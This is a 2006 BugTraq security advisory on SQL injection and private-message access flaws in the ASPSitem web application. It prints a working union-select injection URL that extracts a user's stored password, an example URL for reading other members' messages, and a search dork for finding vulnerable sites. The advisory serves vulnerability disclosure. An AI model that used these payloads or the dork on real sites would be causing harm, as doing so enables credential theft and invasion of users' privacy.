BugTraq
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities. May 28 2006 02:06PM
Mustafa Can Bjorn IPEKCI (nukedx nukedx com)
--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx (at) nukedx (dot) com [email concealed]
Web: http://www.nukedx.com
}
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL
queries to bid parameter in Anket.asp.
Remote attacker also can read others private messages.The parameter id
in Hesabim.asp did not sanitized properly
for checking the owner status of private message.
Level: Critical
---
How&Example:
SQL injection ->
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE ->
http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0
%20from%20uyeler%20where%20
id%20like%201
with this example remote attacker can leak userid 1's login
information from database.
Read others private messages ->
GET/EXAMPLE ->
http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusernam
e
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
* 27/05/2006: Vendor already released patch for SQL injection you can
find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710
--
Exploit: http://www.nukedx.com/?getxpl=39
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
---
Dorks: "Teþekkür ASPSitem"

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus